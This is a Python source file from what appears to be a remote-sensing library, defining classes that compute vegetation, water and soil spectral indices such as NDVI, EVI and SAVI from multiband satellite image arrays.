'PNDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'RBVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'GBVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'ONDVI': '(4. / pi) * arctan(((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor)))',
'SATVI': '((((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor) + L)) * (1. + L)) - '
'((array03 / scale_factor) / 2.)',
'SAVI': '(((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor) + L)) * (1. + L)',
'OSAVI': 'arctan(((((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor) + L)) * (1. + L)) / 1.5) * 2.',
'SVI': '(array02 / scale_factor) / (array01 / scale_factor)',
'TNDVI': 'sqrt((((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))) * .5)',
'TVI': 'sqrt((((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))) + .5)',
'TWVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'YNDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'VCI': '(((array02 - array01) / (array02 + array01)) - min_ndvi) / (max_ndvi - min_ndvi)',
'VISMU': '((array01 / scale_factor) + (array02 / scale_factor) + (array03 / scale_factor)) / 3.',
'WI': '(array01 / scale_factor) + (array02 / scale_factor)'}
# The data ranges for scaling, but only
# used if the output storage type is not
# equal to 'float32'.
self.data_ranges = {'ARVI': (),
'BRIGHT': (0.0, 1.0),
'CBI': (-1.0, 1.0),
'CIRE': (-1.0, 1.0),
'EVI': (0., 1.0),
'EVI2': (0., 1.0),
'IPVI': (),
'MSAVI': (),
'GNDVI': (-1.0, 1.0),
'MNDWI': (-1.0, 1.0),
'NDSI': (-1.0, 1.0),
'NDBAI': (-1.0, 1.0),
'NBRI': (-1.0, 1.0),
'NDII': (-1.0, 1.0),
'NDVI': (-1.0, 1.0),
'RENDVI': (-1.0, 1.0),
'NDWI': (-1.0, 1.0),
'PNDVI': (-1.0, 1.0),
'RBVI': (-1.0, 1.0),
'GBVI': (-1.0, 1.0),
'ONDVI': (),
'SATVI': (),
'SAVI': (),
'OSAVI': (),
'SVI': (),
'TNDVI': (),
'TVI': (),
'YNDVI': (-1.0, 1.0),
'TWVI': (-1, 1),
'VCI': (),
'VISMU': (0., 1.0),
'WI': (0.0, 1.0)}
def list_expected_band_order(self, sensor):
# Return the dictionary sorted by values
self.expected_band_order = OrderedDict(sorted(list(iteritems(self.band_orders[sensor])), key=lambda sbo: sbo[1]))
logger.info('\nExpected band order for {}:\n'.format(sensor))
logger.info(' WAVELENGTH Band')
logger.info(' ---------- ----')
sp = ' '
for w, b in viewitems(self.expected_band_order):
gap_string = ''
gap_len = 12 - len(w)
for gx in range(0, gap_len):
gap_string += sp
logger.info(' {}{}{:d}'.format(w.upper(), gap_string, b))
print('')
def list_indice_options(self, sensor):
"""
Lists the vegetation indices that can be computed from the given sensor.
Args:
sensor (str): The sensor.
"""
if sensor not in self.sensors:
raise NameError('{} not a sensor option. Choose one of {}'.format(sensor, ', '.join(self.sensors)))
self.sensor_indices = []
# A list of wavelengths in the
# current sensor.
sensor_wavelengths = list(self.band_orders[sensor])
# All of the vegetation index wavelengths must
# be in the sensor wavelength.
for veg_index, indice_wavelengths in viewitems(self.wavelength_lists):
if set(indice_wavelengths).issubset(sensor_wavelengths):
self.sensor_indices.append(veg_index)
class VegIndicesEquations(SensorInfo):
"""
A class to compute vegetation indices
Args:
image_array (ndarray)
no_data (Optional[int]): The output 'no data' value. Overflows and NaNs are filled with ``no_data``.
Default is 0.
in_no_data (Optional[int]): The input 'no data' value.
chunk_size (Optional[int]): The chunk size to determine whether to use ``ne.evaluate``. Default is -1, or
use ``numexpr``.
        mask_array (Optional[2d array]): A mask where anything equal to 1 is treated as background (matching the check in ``run_index``). Default is None.
"""
def __init__(self, image_array, no_data=0, in_no_data=0, chunk_size=-1, mask_array=None):
self.image_array = np.float32(image_array)
self.no_data = no_data
self.in_no_data = in_no_data
self.chunk_size = chunk_size
self.mask_array = mask_array
SensorInfo.__init__(self)
        try:
            self.array_dims, self.array_rows, self.array_cols = image_array.shape
        except ValueError:
            raise ValueError('The input array must be at least 3d.')
def rescale_range(self, array2rescale, in_range=()):
if self.out_type > 3:
raise ValueError('The output type cannot be greater than 3.')
if self.out_type == 2:
if in_range:
array2rescale_ = np.uint8(rescale_intensity(array2rescale,
in_range=in_range,
out_range=(0, 254)))
else:
array2rescale_ = np.uint8(rescale_intensity(array2rescale, out_range=(0, 254)))
elif self.out_type == 3:
if in_range:
array2rescale_ = np.uint16(rescale_intensity(array2rescale,
in_range=in_range,
out_range=(0, 10000)))
else:
array2rescale_ = np.uint16(rescale_intensity(array2rescale, out_range=(0, 10000)))
return np.where(array2rescale == self.no_data, self.no_data, array2rescale_)
def compute(self, vi_index, out_type=1, scale_factor=1.0, **kwargs):
"""
Args:
vi_index (str): The vegetation index to compute.
out_type (Optional[int]): This controls the output scaling. Default is 1, or return 'as is'. Choices
are [1, 2, 3].
1 = raw values (float32)
2 = scaled (byte)
3 = scaled (uint16)
scale_factor (Optional[float]): A scale factor to divide the inputs by. Default is 1.
Example:
>>> from mappy.features import VegIndicesEquations
>>>
>>> # Create a fake 2-band array.
            >>> image_stack = np.random.randn(2, 100, 100).astype('float32')
>>>
>>> # Setup the vegetation index object.
>>> vie = VegIndicesEquations(image_stack)
>>>
>>> # Calculate the NDVI vegetation index.
>>> ndvi = vie.compute('NDVI')
"""
self.vi_index = vi_index
self.out_type = out_type
self.n_bands = len(self.wavelength_lists[self.vi_index.upper()])
# Use ``numexpr``.
if self.chunk_size == -1:
if vi_index.lower() == 'twvi':
imcopy = self.image_array.copy()
if kwargs:
self.image_array = imcopy[:2]
self.vi_index = 'evi2'
evi2 = self.run_index(scale_factor, **kwargs)
self.image_array = imcopy[1:]
self.vi_index = 'ndsi'
ndsi = self.run_index(scale_factor, **kwargs)
else:
self.image_array = imcopy[:2]
self.vi_index = 'evi2'
evi2 = self.run_index(scale_factor)
self.image_array = imcopy[1:]
self.vi_index = 'ndsi'
ndsi = self.run_index(scale_factor)
ndsi = rescale_intensity(ndsi, in_range=(-1, 1), out_range=(0, 1))
self.image_array = np.stack((evi2, ndsi))
self.vi_index = 'twvi'
if kwargs:
return self.run_index(scale_factor, **kwargs)
else:
return self.run_index(scale_factor)
else:
vi_functions = {'ARVI': self.ARVI,
'BRIGHT': self.BRIGHT,
'CBI': self.CBI,
                            'CIRE': self.CIre,
'EVI': self.EVI,
'EVI2': self.EVI2,
'IPVI': self.IPVI,
'GNDVI': self.GNDVI,
'MNDWI': self.MNDWI,
'MSAVI': self.MSAVI,
'NDSI': self.NDSI,
'NDBAI': self.NDBAI,
'NBRI': self.NBR,
'NDVI': self.NDVI,
'RENDVI': self.RENDVI,
'ONDVI': self.ONDVI,
'NDWI': self.NDWI,
'PNDVI': self.PNDVI,
'RBVI': self.RBVI,
'GBVI': self.GBVI,
'SATVI': self.SATVI,
'SAVI': self.SAVI,
'OSAVI': self.OSAVI,
'SVI': self.SVI,
'TNDVI': self.TNDVI,
'TVI': self.TVI,
'TWVI': self.TWVI,
'YNDVI': self.YNDVI,
'VCI': self.VCI,
'WI': self.WI}
if self.vi_index.upper() not in vi_functions:
raise NameError('{} is not a vegetation index option.'.format(self.vi_index))
vi_function = vi_functions[self.vi_index.upper()]
if kwargs:
return vi_function(kwargs)
else:
return vi_function()
def run_index(self, scale_factor, y=1., g=2.5, L=1., min_ndvi=-1, max_ndvi=1, **kwargs):
        # EVI coefficient defaults; read from kwargs when supplied so that
        # ne.evaluate() can always resolve c1/c2 for the EVI equations
        if self.vi_index.upper() == 'EVI':
            c1 = kwargs.get('c1', 6.0)
            c2 = kwargs.get('c2', 7.5)
        elif self.vi_index.upper() == 'EVI2':
            c1 = kwargs.get('c1', 2.4)
no_data = self.no_data
in_no_data = self.in_no_data
pi = np.pi
# Setup a mask
if isinstance(self.mask_array, np.ndarray):
mask_array = self.mask_array
mask_equation = 'where(mask_array == 1, no_data, index_array)'
if self.n_bands == 2:
if self.image_array.shape[0] != 2:
logger.error(' The input array should have {:d} dimensions.'.format(self.n_bands))
raise ValueError
array01 = self.image_array[0]
array02 = self.image_array[1]
if not isinstance(self.mask_array, np.ndarray):
mask_equation = 'where((array01 == in_no_data) | (array02 == in_no_data), no_data, index_array)'
elif self.n_bands == 3:
if self.image_array.shape[0] != 3:
logger.error(' The input array should have {:d} dimensions.'.format(self.n_bands))
raise ValueError
array01 = self.image_array[0]
array02 = self.image_array[1]
array03 = self.image_array[2]
if not isinstance(self.mask_array, np.ndarray):
mask_equation = 'where((array01 == in_no_data) | (array02 == in_no_data) | (array03 == in_no_data), no_data, index_array)'
else:
logger.error(' The input array needs 2 or 3 bands.')
raise ValueError
index_array = ne.evaluate(self.equations[self.vi_index.upper()])
if self.vi_index.upper() == 'WI':
index_array = np.where(index_array > 0.5, 0, 1.0 - (index_array / 0.5))
d_range = self.data_ranges[self.vi_index.upper()]
if d_range:
if d_range[0] == -9999:
scale_data = False
else:
scale_data = True
# Clip lower and upper bounds.
index_array = ne.evaluate('where(index_array < {:f}, {:f}, index_array)'.format(d_range[0], d_range[0]))
index_array = ne.evaluate('where(index_array > {:f}, {:f}, index_array)'.format(d_range[1], d_range[1]))
# if self.out_type != 1:
# index_array += abs(d_range[0])
else:
scale_data = False
if scale_data:
if self.data_ranges[self.vi_index.upper()]:
if self.out_type == 2:
index_array = np.uint8(self.rescale_range(index_array, in_range=d_range))
elif self.out_type == 3:
index_array = np.uint16(self.rescale_range(index_array, in_range=d_range))
else:
if self.out_type == 2:
index_array = np.uint8(self.rescale_range(index_array, in_range=(0, 10000)))
elif self.out_type == 3:
index_array = np.uint16(index_array)
index_array[np.isinf(index_array) | np.isnan(index_array)] = self.no_data
index_array = ne.evaluate(mask_equation)
return index_array
def ARVI(self, y=1):
"""
Atmospherically Resistant Vegetation Index (ARVI)
Equation:
(nir - rb) / (nir + rb)
where, rb = red - y(blue - red)
where, y = gamma value (weighting factor depending on aersol type), (0.7 to 1.3)
"""
try:
blue = self.image_array[0]
red = self.image_array[1]
nir = self.image_array[2]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
        rb1 = np.multiply(np.subtract(blue, red), y)
        rb = np.subtract(red, rb1)
        arvi = self.main_index(rb, nir)  # (nir - rb) / (nir + rb), per the equation above
arvi[(blue == 0) | (red == 0) | (nir == 0)] = self.no_data
arvi[np.isinf(arvi) | np.isnan(arvi)] = self.no_data
if self.out_type > 1:
arvi = self.rescale_range(arvi)
return arvi
def BRIGHT(self):
try:
green = self.image_array[0]
red = self.image_array[1]
nir = self.image_array[2]
midir = self.image_array[3]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
bright = np.sqrt(green**2 + red**2 + nir**2 + midir**2)
bright[(green == 0) | (red == 0) | (nir == 0) | (midir == 0)] = self.no_data
bright[np.isinf(bright) | np.isnan(bright)] = self.no_data
if self.out_type > 1:
bright = self.rescale_range(bright)
return bright
def CBI(self):
"""
Coastal-Blue Index
Equation:
CBI = (blue - cblue) / (blue + cblue)
"""
try:
cblue = self.image_array[0]
blue = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
cbi = self.main_index(cblue, blue)
cbi[(cblue == 0) | (blue == 0)] = self.no_data
cbi[np.isinf(cbi) | np.isnan(cbi)] = self.no_data
if self.out_type > 1:
cbi = self.rescale_range(cbi, in_range=(-1., 1.))
return cbi
def CIre(self):
"""
Chlorophyll Index red-edge (CIre)
References:
Clevers, J.G.P.W. & <NAME>. (2013) Remote estimation of crop and grass chlorophyll and
nitrogen content using red-edge bands on Sentinel-2 and -3. International Journal of Applied
Earth Observation and Geoinformation, 23, 344-351.
"""
try:
rededge = self.image_array[0]
rededge3 = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ci_re = np.subtract(np.divide(rededge3, rededge), 1.)
ci_re[(rededge == 0) | (rededge3 == 0)] = self.no_data
ci_re[np.isinf(ci_re) | np.isnan(ci_re)] = self.no_data
if self.out_type > 1:
ci_re = self.rescale_range(ci_re, in_range=(0., 1.))
return ci_re
def EVI(self, c1=6., c2=7.5, g=2.5, L=1.):
"""
Enhanced Vegetation Index (EVI)
        Equation:
            EVI = g * ((nir - red) / (nir + c1*red - c2*blue + L))
            where c1 = 6, c2 = 7.5, L = 1, g = 2.5
References:
Huete et al. (2002) Overview of the radiometric and biophysical performance of the
MODIS vegetation indices. Remote Sensing of Environment, 83, 195-213.
"""
try:
blue = self.image_array[0]
red = self.image_array[1]
nir = self.image_array[2]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
top = np.subtract(nir, red)
red_c1 = np.multiply(c1, red)
blue_c2 = np.multiply(c2, blue)
bottom = np.add(np.add(np.subtract(red_c1, blue_c2), nir), L)
evi = np.divide(top, bottom)
evi = np.multiply(evi, g)
evi[(blue == 0) | (red == 0) | (nir == 0)] = self.no_data
evi[np.isinf(evi) | np.isnan(evi)] = self.no_data
if self.out_type > 1:
evi = self.rescale_range(evi, in_range=(0., 1.))
return evi
def EVI2(self, c1=2.4, g=2.5, L=1.):
"""
Enhanced Vegetation Index (EVI2)
Reference:
<NAME>, <NAME>, <NAME>, and <NAME>. 2008. "Development of a
two-band enhanced vegetation index without a blue band." Remote Sensing of Environment 112: 3833-3845.
        Equation:
            EVI2 = g * ((nir - red) / (nir + c1*red + L))
            where c1 = 2.4, g = 2.5, L = 1
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
top = np.subtract(nir, red)
bottom = np.add(np.add(np.multiply(red, c1), nir), L)
evi2 = np.divide(top, bottom)
evi2 = np.multiply(evi2, g)
evi2[(red == 0) | (nir == 0)] = self.no_data
evi2[np.isinf(evi2) | np.isnan(evi2)] = self.no_data
if self.out_type > 1:
evi2 = self.rescale_range(evi2, in_range=(0., 1.))
return evi2
def IPVI(self):
"""
Equation:
IPVI = nir / (nir + red)
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
bottom = np.add(nir, red)
ipvi = np.divide(nir, bottom)
ipvi[(red == 0) | (nir == 0)] = self.no_data
ipvi[np.isinf(ipvi) | np.isnan(ipvi)] = self.no_data
if self.out_type > 1:
ipvi = self.rescale_range(ipvi)
return ipvi
def MSAVI(self):
"""
Modified Soil Adjusted Vegetation Index (MSAVI2)
Equation:
((2 * nir + 1) - sqrt(((2 * nir + 1)^2) - (8 * (nir - Red)))) / 2
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
topR1 = np.add(np.multiply(nir, 2.), 1.)
topR2 = np.power(topR1, 2.)
topR4 = np.multiply(np.subtract(nir, red), 8.)
topR5 = np.subtract(topR2, topR4)
topR6 = np.sqrt(topR5)
msavi = np.subtract(topR1, topR6)
msavi = np.divide(msavi, 2.)
msavi[(red == 0) | (nir == 0)] = self.no_data
msavi[np.isinf(msavi) | np.isnan(msavi)] = self.no_data
if self.out_type > 1:
msavi = self.rescale_range(msavi)
return msavi
def GNDVI(self):
"""
Green Normalised Difference Vegetation Index (GNDVI)
Equation:
GNDVI = (NIR - green) / (NIR + green)
"""
try:
green = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
gndvi = self.main_index(green, nir)
gndvi[(gndvi < -1.)] = -1.
gndvi[(gndvi > 1.)] = 1.
gndvi[(green == 0) | (nir == 0)] = self.no_data
gndvi[np.isinf(gndvi) | np.isnan(gndvi)] = self.no_data
if self.out_type > 1:
gndvi = self.rescale_range(gndvi, in_range=(-1., 1.))
return gndvi
def MNDWI(self):
"""
Modified Normalised Difference Water Index (MNDWI)
Equation:
MNDWI = (green - MidIR) / (green + MidIR)
Reference:
<NAME> (2006) Modification of normalised difference water index (NDWI) to enhance
open water features in remotely sensed imagery. IJRS 27:14.
"""
try:
midir = self.image_array[0]
green = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
mndwi = self.main_index(midir, green)
mndwi[(mndwi < -1.)] = -1.
mndwi[(mndwi > 1.)] = 1.
mndwi[(green == 0) | (midir == 0)] = self.no_data
mndwi[np.isinf(mndwi) | np.isnan(mndwi)] = self.no_data
if self.out_type > 1:
mndwi = self.rescale_range(mndwi, in_range=(-1., 1.))
return mndwi
def NDSI(self):
"""
Normalised Difference Soil Index (NDSI) (Rogers) or
Normalised Difference Water Index (NDWI) (Gao)
Equation:
NDSI = (MidIR - NIR) / (MidIR + NIR)
References:
<NAME>. & <NAME>. (2004) 'Reducing signature
variability in unmixing coastal marsh Thematic
Mapper scenes using spectral indices' International
Journal of Remote Sensing, 25(12), 2317-2335.
<NAME> (1996) 'NDWI A Normalized Difference Water
Index for Remote Sensing of Vegetation Liquid Water
From Space' Remote Sensing of Environment.
"""
try:
nir = self.image_array[0]
midir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ndsi = self.main_index(nir, midir)
ndsi[(ndsi < -1.)] = -1.
ndsi[(ndsi > 1.)] = 1.
ndsi[(nir == 0) | (midir == 0)] = self.no_data
ndsi[np.isinf(ndsi) | np.isnan(ndsi)] = self.no_data
if self.out_type > 1:
ndsi = self.rescale_range(ndsi, in_range=(-1., 1.))
return ndsi
def NDBAI(self):
"""
Normalised Difference Bareness Index (NDBaI)
Equation:
NDBaI = (FarIR - MidIR) / (FarIR + MidIR)
Reference:
<NAME>, Chen, Xiaoling (2005) 'Use of Normalized
Difference Bareness Index in Quickly Mapping Bare
Areas from TM/ETM+' IEEE.
"""
try:
midir = self.image_array[0]
farir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ndbai = self.main_index(midir, farir)
ndbai[(ndbai < -1.)] = -1.
ndbai[(ndbai > 1.)] = 1.
ndbai[(midir == 0) | (farir == 0)] = self.no_data
ndbai[np.isinf(ndbai) | np.isnan(ndbai)] = self.no_data
if self.out_type > 1:
ndbai = self.rescale_range(ndbai, in_range=(-1., 1.))
return ndbai
def NBR(self):
"""
Normalised Burn Ratio (NBR)
Equation:
NBR = (NIR - FarIR) / (NIR + FarIR)
"""
try:
farir = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
nbr = self.main_index(farir, nir)
nbr[(nbr < -1.)] = -1.
nbr[(nbr > 1.)] = 1.
        nbr[(farir == 0) | (nir == 0)] = self.no_data
nbr[np.isinf(nbr) | np.isnan(nbr)] = self.no_data
if self.out_type > 1:
nbr = self.rescale_range(nbr, in_range=(-1.0, 1.0))
return nbr
def NDVI(self):
"""
Normalised Difference Vegetation Index (NDVI)
Equation:
NDVI = (NIR - red) / (NIR + red)
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ndvi = self.main_index(red, nir)
ndvi[(ndvi < -1.)] = -1.
ndvi[(ndvi > 1.)] = 1.
ndvi[(red == 0) | (nir == 0)] = self.no_data
ndvi[np.isinf(ndvi) | np.isnan(ndvi)] = self.no_data
if self.out_type > 1:
ndvi = self.rescale_range(ndvi, in_range=(-1., 1.))
return ndvi
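    # Worked example (hypothetical reflectance values, for illustration):
    # red = 0.10, nir = 0.50  ->  NDVI = (0.50 - 0.10) / (0.50 + 0.10) ≈ 0.667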
def RENDVI(self):
"""
Rededge Normalised Difference Vegetation Index (RENDVI)
Equation:
RENDVI = (NIR - rededge) / (NIR + rededge)
"""
try:
rededge = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
rendvi = self.main_index(rededge, nir)
rendvi[(rendvi < -1.)] = -1.
rendvi[(rendvi > 1.)] = 1.
rendvi[(rededge == 0) | (nir == 0)] = self.no_data
rendvi[np.isinf(rendvi) | np.isnan(rendvi)] = self.no_data
if self.out_type > 1:
rendvi = self.rescale_range(rendvi, in_range=(-1., 1.))
return rendvi
def NDWI(self):
"""
Normalised Difference Water Index (NDWI)
Equation:
NDWI = (green - NIR) / (green + NIR)
Reference:
<NAME>. (1996) 'The use of the Normalized Difference
Water Index (NDWI) in the delineation of open water
features, International Journal of Remote Sensing, 17(7),
1425-1432.
"""
try:
nir = self.image_array[0]
green = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
ndwi = self.main_index(nir, green)
ndwi[(ndwi < -1.)] = -1.
ndwi[(ndwi > 1.)] = 1.
ndwi[(green == 0) | (nir == 0)] = self.no_data
ndwi[np.isinf(ndwi) | np.isnan(ndwi)] = self.no_data
if self.out_type > 1:
ndwi = self.rescale_range(ndwi, in_range=(-1., 1.))
return ndwi
def PNDVI(self):
"""
Pseudo Normalised Difference Vegetation Index (PNDVI)
Equation:
PNDVI = (red - green) / (red + green)
"""
try:
green = self.image_array[0]
red = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
pndvi = self.main_index(green, red)
pndvi[(pndvi < -1.)] = -1.
pndvi[(pndvi > 1.)] = 1.
pndvi[(green == 0) | (red == 0)] = self.no_data
pndvi[np.isinf(pndvi) | np.isnan(pndvi)] = self.no_data
if self.out_type > 1:
pndvi = self.rescale_range(pndvi, in_range=(-1., 1.))
return pndvi
def RBVI(self):
"""
Red Blue Vegetation Index (RBVI)
Equation:
RBVI = (red - blue) / (red + blue)
"""
try:
blue = self.image_array[0]
red = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
rbvi = self.main_index(blue, red)
rbvi[(rbvi < -1.)] = -1.
rbvi[(rbvi > 1.)] = 1.
rbvi[(blue == 0) | (red == 0)] = self.no_data
rbvi[np.isinf(rbvi) | np.isnan(rbvi)] = self.no_data
if self.out_type > 1:
rbvi = self.rescale_range(rbvi, in_range=(-1., 1.))
return rbvi
def GBVI(self):
"""
Green Blue Vegetation Index (GBVI)
Equation:
GBVI = (green - blue) / (green + blue)
"""
try:
blue = self.image_array[0]
green = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
gbvi = self.main_index(blue, green)
gbvi[(gbvi < -1.)] = -1.
gbvi[(gbvi > 1.)] = 1.
gbvi[(blue == 0) | (green == 0)] = self.no_data
gbvi[np.isinf(gbvi) | np.isnan(gbvi)] = self.no_data
if self.out_type > 1:
gbvi = self.rescale_range(gbvi, in_range=(-1., 1.))
return gbvi
def ONDVI(self):
"""
Theta Normalised Difference Vegetation Index (0NDVI)
Equation:
(4 / pi) * arctan(NDVI)
"""
original_type = copy(self.out_type)
self.out_type = 1
ndvi = self.NDVI()
self.out_type = original_type
red = self.image_array[0]
nir = self.image_array[1]
ondvi = np.multiply(np.arctan(ndvi), 4. / np.pi)
ondvi[(red == 0) | (nir == 0)] = self.no_data
ondvi[np.isinf(ondvi) | np.isnan(ondvi)] = self.no_data
if self.out_type > 1:
ondvi = self.rescale_range(ondvi)
return ondvi
def SATVI(self, L=.5):
"""
Soil Adjusted Total Vegetation Index (SATVI)
        Equation:
            [((midir - red) / (midir + red + L)) * (1 + L)] - (farir / 2)
"""
try:
red = self.image_array[0]
midir = self.image_array[1]
farir = self.image_array[2]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
top_r0 = np.subtract(midir, red)
top_r1 = np.add(np.add(midir, red), L)
top_r2 = np.divide(top_r0, top_r1)
satvi = np.multiply(top_r2, 1.+L)
satvi = np.subtract(satvi, np.divide(farir, 2.))
satvi[(red == 0) | (midir == 0) | (farir == 0)] = self.no_data
satvi[np.isinf(satvi) | np.isnan(satvi)] = self.no_data
if self.out_type > 1:
satvi = self.rescale_range(satvi)
return satvi
def SAVI(self, L=.5):
"""
Soil Adjusted Vegetation Index (SAVI)
Equation:
((NIR - red) / (NIR + red + L)) * (1 + L)
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
top_r = np.subtract(nir, red)
top_rx = np.multiply(top_r, 1.+L)
bottom = np.add(np.add(red, nir), L)
savi = np.divide(top_rx, bottom)
savi[(red == 0) | (nir == 0)] = self.no_data
savi[np.isinf(savi) | np.isnan(savi)] = self.no_data
if self.out_type > 1:
savi = self.rescale_range(savi)
return savi
def OSAVI(self, L=.5):
"""
Theta Soil Adjusted Vegetation Index (0SAVI)
        Equation:
            arctan((((nir - red) / (nir + red + L)) * (1 + L)) / 1.5) * 2
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
original_type = copy(self.out_type)
self.out_type = 1
osavi = self.SAVI()
self.out_type = original_type
osavi = np.multiply(np.arctan(np.divide(osavi, 1.5)), 2.)
osavi[(red == 0) | (nir == 0)] = self.no_data
osavi[np.isinf(osavi) | np.isnan(osavi)] = self.no_data
if self.out_type > 1:
osavi = self.rescale_range(osavi)
return osavi
def SVI(self):
"""
Simple Vegetation Index (SVI)
Equation:
NIR / red
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
svi = np.divide(nir, red)
svi[(red == 0) | (nir == 0)] = self.no_data
svi[np.isinf(svi) | np.isnan(svi)] = self.no_data
if self.out_type > 1:
svi = self.rescale_range(svi)
return svi
def TNDVI(self):
"""
Transformed Normalised Difference Vegetation Index (TNDVI)
Equation:
Square Root(((NIR - red) / (NIR + red)) * 0.5)
"""
try:
red = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
original_type = copy(self.out_type)
self.out_type = 1
tndvi = self.NDVI()
self.out_type = original_type
tndvi = np.sqrt(np.multiply(tndvi, .5))
tndvi[(red == 0) | (nir == 0)] = self.no_data
tndvi[np.isinf(tndvi) | np.isnan(tndvi)] = self.no_data
if self.out_type > 1:
tndvi = self.rescale_range(tndvi)
return tndvi
def TVI(self):
"""
Transformed Vegetation Index (TVI)
Equation:
Square Root(((NIR - green) / (NIR + green)) + 0.5)
"""
original_type = copy(self.out_type)
self.out_type = 1
tvi = self.GNDVI()
self.out_type = original_type
green = self.image_array[0]
nir = self.image_array[1]
tvi = np.sqrt(np.add(tvi, .5))
tvi[(green == 0) | (nir == 0)] = self.no_data
tvi[np.isinf(tvi) | np.isnan(tvi)] = self.no_data
if self.out_type > 1:
tvi = self.rescale_range(tvi)
return tvi
def YNDVI(self):
"""
Yellow Normalized Difference Vegetation Index (YNDVI)
Equation:
YNDVI = (nir - yellow) / (nir + yellow)
"""
try:
yellow = self.image_array[0]
nir = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
yndvi = self.main_index(yellow, nir)
yndvi[(yndvi < -1.)] = -1.
yndvi[(yndvi > 1.)] = 1.
yndvi[(yellow == 0) | (nir == 0)] = self.no_data
yndvi[np.isinf(yndvi) | np.isnan(yndvi)] = self.no_data
if self.out_type > 1:
yndvi = self.rescale_range(yndvi, in_range=(-1., 1.))
return yndvi
def VCI(self, min_ndvi=-1, max_ndvi=1):
"""
Vegetation Condition Index (VCI)
Reference:
Kogan (1997) & Kogan et al. (2011)
Equation:
(NDVI - NDVI_min) / (NDVI_max - NDVI_min)
"""
original_type = copy(self.out_type)
self.out_type = 1
ndvi = self.NDVI()
self.out_type = original_type
red = self.image_array[0]
nir = self.image_array[1]
vci = np.subtract(ndvi, min_ndvi)
vci_bot = np.subtract(max_ndvi, min_ndvi)
vci = np.divide(vci, vci_bot)
vci[(red == 0) | (nir == 0)] = self.no_data
vci[np.isinf(vci) | np.isnan(vci)] = self.no_data
if self.out_type > 1:
vci = self.rescale_range(vci)
return vci
def WI(self):
"""
Woody index
Equation:
WI = 1 - ((red + swir1) / 0.5)
"""
try:
red = self.image_array[0]
swir1 = self.image_array[1]
except:
raise ValueError('\nThe input array should have {:d} dimensions.\n'.format(self.n_bands))
wi = red + swir1
wi = np.where(wi > 0.5, 0, 1.0 - (wi / 0.5))
        wi[(red == 0) | (swir1 == 0)] = self.no_data
wi[np.isinf(wi) | np.isnan(wi)] = self.no_data
if self.out_type > 1:
wi = self.rescale_range(wi, in_range=(0, 1))
return wi
def main_index(self, array01, array02):
top = np.subtract(array02, array01)
bottom = np.add(array02, array01)
return np.divide(top, bottom)
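# A hedged, self-contained sketch (never called by the module): a worked
# example of the normalized-difference form that main_index() computes,
# using made-up reflectance values.
def _main_index_demo():
    import numpy as np  # numpy is already a dependency of this module
    red = np.array([0.1, 0.2, 0.3])
    nir = np.array([0.5, 0.5, 0.5])
    nd = np.divide(np.subtract(nir, red), np.add(nir, red))
    # nd is approximately [0.6667, 0.4286, 0.25]
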